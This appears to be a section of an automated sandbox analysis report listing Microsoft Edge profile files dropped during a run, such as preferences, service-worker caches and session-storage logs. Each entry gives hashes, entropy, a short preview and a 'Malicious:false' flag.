                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF493ff.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.566358911446204
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WZzljYWPrXfGd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuXWVsrwjypRtu5:WZzljYWPrXfGdu1jaPmVFwt2
                                                                                                                                                                                                                                                                                                  MD5:A956E0076959A92FE6BA2186DAF41D72
                                                                                                                                                                                                                                                                                                  SHA1:0F5FB90FE215BB72A3CA26CB186107176860E1FF
                                                                                                                                                                                                                                                                                                  SHA-256:DC99216303DAC945AC9E7E28C621A62088CAC185C081A78DA213963A7174E669
                                                                                                                                                                                                                                                                                                  SHA-512:3CF6A92D93DD8F2DEB6E00521522FED1CBC95039660A2697A464D747D4F6D6C086E1DCA221E75E8B10979A9CCF6522057A96C3557C673EC95D69806C318D4743
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4bc95.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.566358911446204
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:WZzljYWPrXfGd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuXWVsrwjypRtu5:WZzljYWPrXfGdu1jaPmVFwt2
                                                                                                                                                                                                                                                                                                  MD5:A956E0076959A92FE6BA2186DAF41D72
                                                                                                                                                                                                                                                                                                  SHA1:0F5FB90FE215BB72A3CA26CB186107176860E1FF
                                                                                                                                                                                                                                                                                                  SHA-256:DC99216303DAC945AC9E7E28C621A62088CAC185C081A78DA213963A7174E669
                                                                                                                                                                                                                                                                                                  SHA-512:3CF6A92D93DD8F2DEB6E00521522FED1CBC95039660A2697A464D747D4F6D6C086E1DCA221E75E8B10979A9CCF6522057A96C3557C673EC95D69806C318D4743
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379405059999046","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379405059999046","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                                  MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                                  SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                                  SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                                  SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):299
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.138565416883806
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:JoLRq1923oH+TcwtE/a252KLljq5sN+q2P923oH+TcwtE/a2ZIFUv:JoLxYeb8xLhE1v4Yeb8J2FUv
                                                                                                                                                                                                                                                                                                  MD5:1BFC1BBC0D656DDE534657198474443C
                                                                                                                                                                                                                                                                                                  SHA1:9E2E8061CA77456BA813AFC2ED697F4DC0348EB8
                                                                                                                                                                                                                                                                                                  SHA-256:5341672198F8EB088A2878C33E43F8631772B52DBA5DC2F220799C4915379485
                                                                                                                                                                                                                                                                                                  SHA-512:5F9B156E482E2A30690863A4EB6029FD641C2115652106649EEDB6D5CE8DCD4830BC0B07B648D37C499A9A2FECBFA0D4D9748806EFFD133DE299DF52522DFEF2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:36.144 1c18 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/23-00:24:36.162 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):114583
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.578492903515659
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekf7k3:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dm
                                                                                                                                                                                                                                                                                                  MD5:BF48F95690853F2CD0948C653D33BC42
                                                                                                                                                                                                                                                                                                  SHA1:4576D9AA1BB7510D3110DF160D64D6963C6E4E9D
                                                                                                                                                                                                                                                                                                  SHA-256:D9D30F321E25358F06A92EA4B66E3650C9716FC5C6741D2EF40EF15ABAF29DA1
                                                                                                                                                                                                                                                                                                  SHA-512:EA92D9B06057C8A249C9A751724D31612FFE6D77B80BD0A205E832E25F5D3E98973386750950252203BA0A202035746DA48A5E0A78B30BCECF5647C6F16B624C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:DIY-Thermocam raw data (Lepton 2.x), scale 16384-1040, spot sensor temperature 88544371553805847756800.000000, unit celsius, color scheme 0, show spot sensor, calibration: offset 8389120.000000, slope 158465089740720881248604520448.000000
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):189129
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.388307037922387
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:9PUIry3HHHKwP09Wz+r4AL/ofTfd6ovbGX1gbu9fUscLO:gKwP1z+XL/uztGVWO
                                                                                                                                                                                                                                                                                                  MD5:1FFBBA1524836439E8A74DF2211EFBCE
                                                                                                                                                                                                                                                                                                  SHA1:DA5B91BEAFF2BAB164E82109F4C7F2E2DC86D7DC
                                                                                                                                                                                                                                                                                                  SHA-256:D934C727B3BF94DEDC5F75D9214FB8F847277A9304475287D849DAF27AFA11BB
                                                                                                                                                                                                                                                                                                  SHA-512:EDB8DF790DD34FE925DF734FFD3B6166F2418BDD865D5289DC61512F80B28AF3F772EC07C7A591013DFE1AEB60A5EDB69AB67CAC3309B55EA42C0DDCE4810F8B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:0\r..m..........rSG.....0....z3.................;.....x.p........,T.8..`,.....L`.....,T...`......L`......RcZ6.+....exports...Rc.t......module....Rc...:....define....Rb........amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.......{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:HUx9Xl/lYV/lxEgQ/hb9l:0xNYWFlH
                                                                                                                                                                                                                                                                                                  MD5:216E9D278C4BEE4A6B57549AAE651DCF
                                                                                                                                                                                                                                                                                                  SHA1:AC8C677F219264430B937C8A20D78770840EBA8C
                                                                                                                                                                                                                                                                                                  SHA-256:29B256BDB9CCD9BF89B83D043345B3EC69409225656624249F7E855719899537
                                                                                                                                                                                                                                                                                                  SHA-512:2290BC87C7CC466C59829F27696133F57C8F0DA879E4C2D2176AD39E5EBAAD06F9503AE88E11BDA013CF46231854E8A2912D9B3A6BBD9A875EE7528FF5613046
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@......hoy retne.........................X....,................h..~../.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:HUx9Xl/lYV/lxEgQ/hb9l:0xNYWFlH
                                                                                                                                                                                                                                                                                                  MD5:216E9D278C4BEE4A6B57549AAE651DCF
                                                                                                                                                                                                                                                                                                  SHA1:AC8C677F219264430B937C8A20D78770840EBA8C
                                                                                                                                                                                                                                                                                                  SHA-256:29B256BDB9CCD9BF89B83D043345B3EC69409225656624249F7E855719899537
                                                                                                                                                                                                                                                                                                  SHA-512:2290BC87C7CC466C59829F27696133F57C8F0DA879E4C2D2176AD39E5EBAAD06F9503AE88E11BDA013CF46231854E8A2912D9B3A6BBD9A875EE7528FF5613046
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@......hoy retne.........................X....,................h..~../.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF4d454.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:HUx9Xl/lYV/lxEgQ/hb9l:0xNYWFlH
                                                                                                                                                                                                                                                                                                  MD5:216E9D278C4BEE4A6B57549AAE651DCF
                                                                                                                                                                                                                                                                                                  SHA1:AC8C677F219264430B937C8A20D78770840EBA8C
                                                                                                                                                                                                                                                                                                  SHA-256:29B256BDB9CCD9BF89B83D043345B3EC69409225656624249F7E855719899537
                                                                                                                                                                                                                                                                                                  SHA-512:2290BC87C7CC466C59829F27696133F57C8F0DA879E4C2D2176AD39E5EBAAD06F9503AE88E11BDA013CF46231854E8A2912D9B3A6BBD9A875EE7528FF5613046
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:@......hoy retne.........................X....,................h..~../.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):8029
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.3483989383968433
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:4te6gpc07+EG5hsbKE10VYvLVtW9Xp+QKiEgLl9iSraXZXc8o:4ngp05huKE19W9Xp+HMLl9iSrqe8o
                                                                                                                                                                                                                                                                                                  MD5:39E7AF3DA8E24800F2BFB0BB9F59AE2E
                                                                                                                                                                                                                                                                                                  SHA1:589B56612C61623B15BB29D3C2C4AB1E94C4052B
                                                                                                                                                                                                                                                                                                  SHA-256:0D8CB27E19C3C46A58F78E7A2562C7D278B92804EEDDF2FC6030937A5F3D474B
                                                                                                                                                                                                                                                                                                  SHA-512:C83A05E18E017D6889E2B07A54395479330EF53828DCA7D42C9321BAE74D4BD0D35D11702DA172F86763EEF36F6DA145034668D2CD60385D6A22BA6D9964E76D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............S..Yb................next-map-id.1.Cnamespace-0d64bf1a_aef4_4228_9e6f_33c06e9c463d-https://ntp.msn.com/.0s....................map-0-shd_sweeper.;{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.p.r.g.-.1.s.w.-.c.n.h.o.r.o.,.1.s.-.r.c.h.o.r.o.,.p.r.g.-.c.a.l.-.h.o.r.o.s.c.o.p.e.,.p.r.g.-.e.h.p.s.b.h.v.,.1.s.-.p.n.p.s.n.i.c.e.r.t.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.3.c.,.p.r.g.-.1.s.w.-.s.a.-.u.i.e.n.i.c.h.e.t.5.b.,.p.r.g.-.1.s.w.-.s.a.-.l.o.n.g.t.e.n.s.o.r.c.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.t.p.s.n.-.p.r.g.l.d.n.g.-.c.,.p.r.g.-.1.s.w.-.t.p.s.n.p.g.2.,.p.r.g.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1366344506739
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:70bN9+q2P923oH+TcwtrQMxIFUt8wcyJZmw+jqX9VkwO923oH+TcwtrQMFLJ:70bN4v4YebCFUt8wcyJ/+jkD5LYebtJ
                                                                                                                                                                                                                                                                                                  MD5:5CCDAFD1294CE790C4699EB37A4D75DE
                                                                                                                                                                                                                                                                                                  SHA1:61B231D32D7C1E4722172CDED6D0F5444571FF03
                                                                                                                                                                                                                                                                                                  SHA-256:5694D2A83BB7195CA835C428D187716602D760764994E88046B38B45C64EF230
                                                                                                                                                                                                                                                                                                  SHA-512:B6C21676A125E286C85E9F34B1F2D3960B7791A8152D15B62C8AB53990BE7D9F1766B7F6ED5D2CBBF85485CD2C9A60DD1D9A86D2CB6391F93EAB7CF6C1B33931
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.748 1db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-00:24:20.749 1db8 Recovering log #3.2024/12/23-00:24:20.752 1db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1366344506739
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:70bN9+q2P923oH+TcwtrQMxIFUt8wcyJZmw+jqX9VkwO923oH+TcwtrQMFLJ:70bN4v4YebCFUt8wcyJ/+jkD5LYebtJ
                                                                                                                                                                                                                                                                                                  MD5:5CCDAFD1294CE790C4699EB37A4D75DE
                                                                                                                                                                                                                                                                                                  SHA1:61B231D32D7C1E4722172CDED6D0F5444571FF03
                                                                                                                                                                                                                                                                                                  SHA-256:5694D2A83BB7195CA835C428D187716602D760764994E88046B38B45C64EF230
                                                                                                                                                                                                                                                                                                  SHA-512:B6C21676A125E286C85E9F34B1F2D3960B7791A8152D15B62C8AB53990BE7D9F1766B7F6ED5D2CBBF85485CD2C9A60DD1D9A86D2CB6391F93EAB7CF6C1B33931
                                                                                                                                                                                                                                                                                                  Malicious:false
